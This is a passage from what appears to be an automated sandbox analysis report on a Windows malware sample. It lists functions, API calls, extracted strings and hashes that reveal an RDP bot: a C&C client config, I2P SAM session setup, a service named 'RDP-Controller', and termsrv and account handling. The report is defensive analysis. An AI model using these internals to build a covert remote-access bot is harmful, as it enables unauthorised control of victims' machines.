                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                    • API String ID: 2122475568-588975189
                    • Opcode ID: 49a18e276fb8c6a2b4951d3360f840af0e0b91061dc9137376a5f74894fb3ec4
                    • Instruction ID: 41532de57c3a43ad13ea21e72bebefd2e5ccda475562b428649cad0a4ac4abe3
                    • Opcode Fuzzy Hash: 49a18e276fb8c6a2b4951d3360f840af0e0b91061dc9137376a5f74894fb3ec4
                    • Instruction Fuzzy Hash: 71513AB6A08B82C6EB50CF29E45436977A1FB89B88F414136DB4D93798DF3CE849D700
                    Function 00007FF8B9153C88 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                    • API String ID: 2122475568-588975189
                    • Opcode ID: 5d1318e734e99b6aa77c2af95f36f6a0782a97f835af939cec4f9924c6791811
                    • Instruction ID: 6653e074592b01f497bee35a026935ab8b2fe29c32cb863a5773a88799eea484
                    • Opcode Fuzzy Hash: 5d1318e734e99b6aa77c2af95f36f6a0782a97f835af939cec4f9924c6791811
                    • Instruction Fuzzy Hash: 80513BB6A08B82C6EB50CF19E45436977A1FB89B88F414136DB4D93358DF3CE849D700
                    Function 00007FF8B91849BF Relevance: 24.6, APIs: 4, Strings: 10, Instructions: 94COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$CountCriticalInitializeManagerOpenSectionSpinfflushfwrite
                    • String ID: $Done$P$ServicesActive$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_scm) failed(gle=%lu)$[E] (%s) -> OpenSCManagerA(SERVICES_ACTIVE_DATABASE) failed(gle=%lu)$[I] (%s) -> %s$scm_init$~
                    • API String ID: 546114577-3142219161
                    • Opcode ID: 3cdc24c023b89066df0a726aa4c710322b7b89a6d544cc8f507da3a1f5a289d7
                    • Instruction ID: d1e2669f39e1dfac3790c993e58b57cdef4c05211904b549cc9ef3edb54e015d
                    • Opcode Fuzzy Hash: 3cdc24c023b89066df0a726aa4c710322b7b89a6d544cc8f507da3a1f5a289d7
                    • Instruction Fuzzy Hash: 1541EA10B0CAC3A2FB208F5CA8C03B812559F163D8F525032C75F6A2E2AE5DBD86B715
                    Function 00007FF8BFAB61A0 Relevance: 24.1, APIs: 10, Strings: 6, Instructions: 104memorysleepCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$Heap$Enter$FreeLeaveProcess$Sleep
                    • String ID: $--TSCB--$-VRSTVE-$KCIT$[D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
                    • API String ID: 610085118-1825955162
                    • Opcode ID: 976fff96366d5551afc8c362ad483118ae7add20c4f03ef8fba7955228ba521d
                    • Instruction ID: 212e0da161c33740eb9b41730af3f389f1c9c83ea08be17d0fe86562dda84c78
                    • Opcode Fuzzy Hash: 976fff96366d5551afc8c362ad483118ae7add20c4f03ef8fba7955228ba521d
                    • Instruction Fuzzy Hash: F2512C21E09E4686E7588B89E842279B7A4FF84FC9F186135DB4E037A5DF3DE4898300
                    Function 00007FF708874688 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 154COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                    • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                    • API String ID: 1721699506-2273971785
                    • Opcode ID: 50e05fe60871ecda0d75aea2f679edb60675657aefb85dd97d6e8b7658f1e7e4
                    • Instruction ID: 9f71ffc43107399a5d26866e7548455b8011f5851fb8a66cedc83221f109d2c8
                    • Opcode Fuzzy Hash: 50e05fe60871ecda0d75aea2f679edb60675657aefb85dd97d6e8b7658f1e7e4
                    • Instruction Fuzzy Hash: 3E617C26E2C54BC5FA20EB54EC40BB8E266AF41788FD40132D54D472E5DF3CE9A6832D
                    Function 00007FF8B9186C3D Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 134stringtimeCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: strlen$CompareFileTime
                    • String ID: %ProgramFiles%\RDP\$TermService$termsrv3$termsrv3$v32.ini$v32.ini
                    • API String ID: 342285119-844192579
                    • Opcode ID: 30368236fa65dfd26f33114051efb4c57a2f7cefb1022de13b1530c22006544d
                    • Instruction ID: 5ec49a44ea275eaf98a0a2e00c77040399e4fb0a871c3d7812d6e86838ea2dd3
                    • Opcode Fuzzy Hash: 30368236fa65dfd26f33114051efb4c57a2f7cefb1022de13b1530c22006544d
                    • Instruction Fuzzy Hash: 8B519321B0C6C341FB219F2AA8D43BA5691AF857C4F464031EB9D4B7C7EE6DE905B740
                    Function 00007FF8BFAB67C4 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 85memorysynchronizationCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: CriticalHeapSection$EnterFreeLeaveObjectProcessSingleWait
                    • String ID: [I] (%s) -> Client gone(client=0x%llx)$routine_gc
                    • API String ID: 4048354325-2700516951
                    • Opcode ID: ceed94a779caef79d74b583b335c059d09e5791cb031e572547082000981e090
                    • Instruction ID: 4a0349742de7a1b4417af5aa895bfc541aa65461b97198f31ea3d65abb330e86
                    • Opcode Fuzzy Hash: ceed94a779caef79d74b583b335c059d09e5791cb031e572547082000981e090
                    • Instruction Fuzzy Hash: 89410065A09E4685EB589FD9DC5227423A0BF44FEDF082635CF2D063E6DE3DE4988310
                    Function 00007FF8BFB8961B Relevance: 21.2, APIs: 4, Strings: 10, Instructions: 181stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: strcpystrlen$strcmp
                    • String ID: DESTINATION$NAMING$NAMING LOOKUP NAME=ME$REPLY$RESULT$SESSION$SESSION CREATE STYLE=STREAM ID=%s DESTINATION=%s SIGNATURE_TYPE=%s %s %s$STATUS$TRANSIENT$VALUE
                    • API String ID: 245486318-5999096
                    • Opcode ID: eeba7b2acda8fb7677d32ffbf99bdfd9e78382d2291282e41cfa6244142f3c80
                    • Instruction ID: 51aa0585b63ad4a6c75e5a66557c7ea8c7fec59a2a4e2cd04572310cd8933f95
                    • Opcode Fuzzy Hash: eeba7b2acda8fb7677d32ffbf99bdfd9e78382d2291282e41cfa6244142f3c80
                    • Instruction Fuzzy Hash: AA713825E0DA4792EE249BADA9103B92390AF85BF4F684331DE6D577D6DF2CA901C340
                    Function 00007FF708878A03 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 118registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: CtrlErrorHandlerLastRegisterServicefflushfwrite
                    • String ID: $P$RDP-Controller$Service running$Service stopping$[E] (%s) -> RegisterServiceCtrlHandler failed(GetLastError=%lu)$[I] (%s) -> %s$svc_main$~
                    • API String ID: 3562457520-1478336053
                    • Opcode ID: 6c288d01f213306c2333a4f5c30fee87f9c9195217028b959cf3247afc90220d
                    • Instruction ID: defef908af9cc2e7a32fa124b1154e7bd3698e1519159341abada77ed5864f4b
                    • Opcode Fuzzy Hash: 6c288d01f213306c2333a4f5c30fee87f9c9195217028b959cf3247afc90220d
                    • Instruction Fuzzy Hash: 5051F350E2C60382FA60F7519D98BB8D2B09F54745FD04036CA0E562E2DF6DE8E6837E
                    Function 00007FF8BFB890CA Relevance: 21.1, APIs: 9, Strings: 5, Instructions: 94memorystringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: Heap$Process$AllocFree$fflushfwritestrlen
                    • String ID: [D] (%s) -> %s$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$mem_realloc$sam3_send_req
                    • API String ID: 1135201459-1870638116
                    • Opcode ID: 227849ff22b57d487b6f2f8b521884c8c6484f6d2e9304749063794b68413051
                    • Instruction ID: bb23f7ffd16834d1c0bdfac5e91b45da8c9275663be49b7cdab2347660a30c74
                    • Opcode Fuzzy Hash: 227849ff22b57d487b6f2f8b521884c8c6484f6d2e9304749063794b68413051
                    • Instruction Fuzzy Hash: A7316661A0E64691FE50AFDDEC446F56390AF89FC4F988035EF4E46796EE2CEA04C740
                    Function 00007FF8B915D110 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 105memorystringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Heap$Process$AllocFreestrcpystrlen
                    • String ID: -LTCMAS-$-LTCSES-$XESS$[D] (%s) -> Logoff(name=%s,s_sid=%s,acct_expires=%x,ts_now=%llx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$on_tick_expiry
                    • API String ID: 925994320-1558387473
                    • Opcode ID: b18a5dea767c13263bad1b16b639a38f1e88cabe660c5e6b695c51396f16af22
                    • Instruction ID: e9d8b64337003f6161a576e53ae7d1ca0d2ee0460542316f32a0f7c578c08e4b
                    • Opcode Fuzzy Hash: b18a5dea767c13263bad1b16b639a38f1e88cabe660c5e6b695c51396f16af22
                    • Instruction Fuzzy Hash: E541ADA1A09BC686FA41AF1DD89037926A4BF84BC4F564034EF1E47396EE3CF841E310
                    Function 00007FF7088744F5 Relevance: 19.6, APIs: 4, Strings: 9, Instructions: 94stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: strlen
                    • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                    • API String ID: 39653677-3852240402
                    • Opcode ID: 7c2280b7281350a20a1e86a721c1de19fd939620f5cfef4fb2be988dbd6acc0c
                    • Instruction ID: 4120ca5c5f383254284aaedfed5cb5014123b9f20952ed870f4261d659df8f7d
                    • Opcode Fuzzy Hash: 7c2280b7281350a20a1e86a721c1de19fd939620f5cfef4fb2be988dbd6acc0c
                    • Instruction Fuzzy Hash: A041625196CA4791FA11FF14AC14BB8E261BF44748FD44131D65E072D6DF3CE9AA832C
                    Function 00007FF8BFAB19D9 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 126networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$accepthtonlhtonsioctlsocketselect
                    • String ID: [E] (%s) -> Failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,client=0x%llx,h=%08x,p=%u)$[W] (%s) -> select timedout(sock=0x%llx)$tcp_accept
                    • API String ID: 2278979430-4175654481
                    • Opcode ID: d839c0b84da7d548b6246506d3ca82f80e2902c7096f5b9e2af1ea17af3298de
                    • Instruction ID: ffddd4770663d87de11e6960a0244bb18847f7b4645361fc5d89ad3bba98ecce
                    • Opcode Fuzzy Hash: d839c0b84da7d548b6246506d3ca82f80e2902c7096f5b9e2af1ea17af3298de
                    • Instruction Fuzzy Hash: 9551D431A08A4285E7284BADE8423B96B60AB407FCF146331DB7D476E9EF3DA5458700
                    Function 00007FF8BFB58590 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 97stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                    • API String ID: 1004003707-2349658452
                    • Opcode ID: 15574e2c6d2e1fb85edecffd2d2a439210e27da6631c3faf606f44d1bffa9230
                    • Instruction ID: 21cd5ac7ce71f56e562ba2d11933e912f2d0d3376197eff1f41c74a6f014f883
                    • Opcode Fuzzy Hash: 15574e2c6d2e1fb85edecffd2d2a439210e27da6631c3faf606f44d1bffa9230
                    • Instruction Fuzzy Hash: 96413861A09687A6FB108BC8E924BF8B361BF047C8F845532EB4D06595DF7CFA66C700
                    Function 00007FF8BFB8C550 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 97stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$cnccli$ini_get_var$server_host
                    • API String ID: 1004003707-2347851921
                    • Opcode ID: cf1616aad114c9908ff762f9604715a07226b35ad3038edca240e245e72a8459
                    • Instruction ID: f07e5cbd02b9b3525c4274db3b98549f494a0c24a44b145ed91f2e8310ea8dab
                    • Opcode Fuzzy Hash: cf1616aad114c9908ff762f9604715a07226b35ad3038edca240e245e72a8459
                    • Instruction Fuzzy Hash: 814136E1A09647A1FA519F98ED007F46360FB843D8F889432EB4D475A6DF3CE949C304
                    Function 00007FF8B915C450 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 97stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                    • API String ID: 1004003707-2349658452
                    • Opcode ID: 002b80f4f3ddb5d95a8a589fbe732dd8bd41aee7437ac21d3b594941e9e699d2
                    • Instruction ID: 287578aa2a21f6dc6dcee38bb3bcc506b3ec7063b81699f57fea1b51d8e784ba
                    • Opcode Fuzzy Hash: 002b80f4f3ddb5d95a8a589fbe732dd8bd41aee7437ac21d3b594941e9e699d2
                    • Instruction Fuzzy Hash: 214128A1F086C7A6FA128F98E9507F42361AF043C8F554536EB4D46596EF7CFA49E300
                    Function 00007FF8B9188AE0 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 97stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
